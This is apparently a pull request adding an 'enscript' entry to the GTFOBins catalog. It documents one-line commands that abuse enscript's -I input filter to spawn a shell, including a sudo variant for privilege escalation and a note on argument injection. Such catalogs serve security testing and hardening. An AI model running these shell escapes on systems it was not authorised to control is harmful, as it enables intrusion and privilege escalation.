### PR TITLE
Add enscript

### DIFF
--- a/_gtfobins/enscript.md
+++ b/_gtfobins/enscript.md
@@ -1,8 +1,7 @@
 ---
 functions:
   shell:
-    - code: enscript /dev/null -qo /dev/null -I 'sh >&2'
-      description: This can be useful when only a limited command argument injection is available.
+    - code: enscript /dev/null -qo /dev/null -I '/bin/sh >&2'
   sudo:
-    - code: sudo enscript /dev/null -qo /dev/null -I 'sh >&2'
+    - code: sudo enscript /dev/null -qo /dev/null -I '/bin/sh >&2'
 ---

--- a/_gtfobins/enscript.md
+++ b/_gtfobins/enscript.md
@@ -1,0 +1,8 @@
+---
+functions:
+  shell:
+    - code: enscript /dev/null -qo /dev/null -I 'sh >&2'
+      description: This can be useful when only a limited command argument injection is available.
+  sudo:
+    - code: sudo enscript /dev/null -qo /dev/null -I 'sh >&2'
+---


### PR DESCRIPTION
As per `enscript` manual:
```
-I filter, --filter=filter
   Read all input files through an input filter filter.  The input filter can be a single command or  a  command
   pipeline.  The filter can refer to the name of the input file with the escape `%s'.  The name of the standard
   input can be changed with the option `--filter-stdin'.

   For example, the following command prints the file `foo.c' by using only upper-case characters:

       enscript --filter="cat %s | tr 'a-z' 'A-Z'" foo.c
-o file An alias for the option -p, --output.
-p file, --output=file
   Leave the output to file file. If the file is `-', enscript sends the output to the standard output stdout.
-q, --quiet, --silent
   Make enscript really quiet. Only fatal error messages are printed to stderr.
```